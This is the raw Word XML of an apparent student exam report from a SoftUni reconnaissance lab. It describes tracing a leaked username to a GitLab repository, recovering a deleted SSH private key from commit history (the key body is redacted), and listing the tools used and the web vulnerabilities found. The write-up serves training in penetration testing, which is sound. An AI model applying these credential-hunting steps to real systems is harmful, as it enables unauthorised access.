        <w:rPr/>
        <w:t xml:space="preserve">🧑‍💻 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 5: GitLab Profiling and Repository Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Used the leaked username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>softuniblogadmin</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> from decoded logs and located the GitLab profile:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🔗 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>https://gitlab.com/softuniblogadmin/mybackup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Found in the repo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa.pub</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> (public SSH key)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>README.md</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> stating:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1274" w:right="567" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Good job but I already deleted my key because my server was compromised!”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🧨 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Step 6: The Breakthrough — Private Key Recovered</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">By reviewing </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>older commits</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, I found that in commit </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_new">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="SourceText"/>
          </w:rPr>
          <w:t>8970beca</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> a file named </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>id_rsa</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> was deleted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>contained a full SSH private key</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, proving the system was at one point directly accessible via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>plaintext</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>-----BEGIN OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>... [full key body]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="80" w:after="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>-----END OPENSSH PRIVATE KEY-----</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🎯 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>directly satisfies the primary exam objective</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> — identification of a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>stored and accessible SSH private key</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🧰 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Tools Used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>base64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SourceText"/>
        </w:rPr>
        <w:t>wpscan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Browser, GitLab interface</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">✅ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Findings Summary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>10 vulnerabilities total:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Reflected XSS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WordPress brute-force</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>WordPress install.php exposed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>No HTTPS (Insecure transport)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Base64 log disclosure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>GitLab account linked via leaked username</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Public key stored in Git</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SSH port open (22/tcp)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="1414" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t xml:space="preserve">🔐 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>Full private SSH key recovered from Git commit history</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> ✅</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="HorizontalLine"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">🏁 </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This exam demonstrated a full reconnaissance process using both passive and active techniques, combining:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Open-source intelligence (OSINT),</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Directory and service enumeration,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Git repository forensics,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>And log file analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">The engagement concluded with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:t>direct discovery of an SSH private key</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>, completing the exam objective.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Quotations"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
        </w:rPr>
        <w:tab/>
        <w:tab/>
        <w:t>Thank you, Luchezar – this was a very interesting and rewarding challenge!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="276" w:beforeAutospacing="0" w:before="0" w:afterAutospacing="0" w:after="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId17"/>
      <w:footerReference w:type="default" r:id="rId18"/>
      <w:type w:val="nextPage"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:left="737" w:right="737" w:header="567" w:top="624" w:footer="794" w:bottom="107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cc"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:charset w:val="cc"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:charset w:val="cc"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:charset w:val="cc"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Segoe UI">
    <w:charset w:val="cc"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
  </w:font>
  <w:font w:name="Courier New">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lineRule="auto" w:line="240" w:before="80" w:after="0"/>
      <w:rPr/>
    </w:pPr>
    <w:r>
      <w:rPr/>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor behindDoc="1" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="19" wp14:anchorId="6D6A420E">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>0</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>66040</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6616065" cy="1270"/>
              <wp:effectExtent l="6985" t="6985" r="6985" b="6985"/>
              <wp:wrapNone/>
              <wp:docPr id="14" name="Straight Connector 19"/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6615360" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:ln w="12600">
                        <a:solidFill>
                          <a:srgbClr val="984807"/>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pt,5.2pt" to="520.85pt,5.2pt" ID="Straight Connector 19" stroked="t" style="position:absolute" wp14:anchorId="6D6A420E">
              <v:stroke color="#984807" weight="12600" joinstyle="round" endcap="flat"/>
              <v:fill o:detectmouseclick="t" on="false"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor behindDoc="1" distT="0" distB="0" distL="0" distR="0" simplePos="0" locked="0" layoutInCell="1" allowOverlap="1" relativeHeight="37" wp14:anchorId="2074F399">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>1384300</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>88900</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="5226685" cy="515620"/>
              <wp:effectExtent l="0" t="0" r="0" b="635"/>
              <wp:wrapNone/>
              <wp:docPr id="15" name="Text Box 16"/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="5226120" cy="515160"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="9360">
                        <a:noFill/>
                      </a:ln>
                    </wps:spPr>
                    <wps:style>
                      <a:lnRef idx="0"/>
                      <a:fillRef idx="0"/>
                      <a:effectRef idx="0"/>
                      <a:fontRef idx="minor"/>
                    </wps:style>
                    <wps:txbx>
                      <w:txbxContent>
                        <w:p>
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:lineRule="auto" w:line="240" w:before="40" w:after="100"/>
                            <w:rPr/>
                          </w:pPr>
                          <w:bookmarkStart w:id="1" w:name="_Hlk24191091"/>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="17"/>
                              <w:szCs w:val="17"/>
                            </w:rPr>
                            <w:t xml:space="preserve">© SoftUni – </w:t>
                          </w:r>
                          <w:hyperlink r:id="rId1">
                            <w:r>
                              <w:rPr>
                                <w:rStyle w:val="InternetLink"/>
                                <w:color w:val="0882DE"/>
                                <w:sz w:val="17"/>
                                <w:szCs w:val="17"/>
                              </w:rPr>
                              <w:t>about.softuni.bg</w:t>
                            </w:r>
                          </w:hyperlink>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="17"/>
                              <w:szCs w:val="17"/>
                            </w:rPr>
                            <w:t>. Copyrighted document. Unauthorized copy, reproduction or use is not permitted.</w:t>
                          </w:r>
                          <w:bookmarkEnd w:id="1"/>
                        </w:p>
                        <w:p>
                          <w:pPr>
                            <w:pStyle w:val="FrameContents"/>
                            <w:spacing w:lineRule="auto" w:line="240" w:before="80" w:after="120"/>
                            <w:ind w:left="567" w:firstLine="284"/>
                            <w:rPr>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r>
                            <w:rPr/>
                            <w:drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="1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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId2"/>
                                        <a:stretch>
                                          <a:fillRect/>
                                        </a:stretch>
                                      </pic:blipFill>
                                      <pic:spPr bwMode="auto">
                                        <a:xfrm>
                                          <a:off x="0" y="0"/>
                                          <a:ext cx="179705" cy="179705"/>
                                        </a:xfrm>
                                        <a:prstGeom prst="rect">
                                          <a:avLst/>
                                        </a:prstGeom>
                                      </pic:spPr>
                                    </pic:pic>
                                  </a:graphicData>
                                </a:graphic>
                              </wp:inline>
                            </w:drawing>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                              <w:lang w:val="bg-BG"/>
                            </w:rPr>
                            <w:t xml:space="preserve">   </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="1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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId3"/>
                                        <a:stretch>
                                          <a:fillRect/>
                                        </a:stretch>
                                      </pic:blipFill>
                                      <pic:spPr bwMode="auto">
                                        <a:xfrm>
                                          <a:off x="0" y="0"/>
                                          <a:ext cx="179705" cy="179705"/>
                                        </a:xfrm>
                                        <a:prstGeom prst="rect">
                                          <a:avLst/>
                                        </a:prstGeom>
                                      </pic:spPr>
                                    </pic:pic>
                                  </a:graphicData>
                                </a:graphic>
                              </wp:inline>
                            </w:drawing>
                          </w:r>
                          <w:r>
                            <w:rPr>
                              <w:color w:val="000000"/>
                              <w:sz w:val="18"/>
                              <w:szCs w:val="18"/>
                              <w:lang w:val="bg-BG"/>
                            </w:rPr>
                            <w:t xml:space="preserve">   </w:t>
                          </w:r>
                          <w:r>
                            <w:rPr/>
                            <w:drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="1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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                                        </pic:cNvPicPr>
                                      </pic:nvPicPr>
                                      <pic:blipFill>
                                        <a:blip r:embed="rId4"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>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5"/>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drawing>
                              <wp:inline distT="0" distB="0" distL="0" distR="0">
                                <wp:extent cx="179705" cy="179705"/>
                                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                <wp:docPr id="2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
                                        <pic:cNvPicPr>
                                          <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
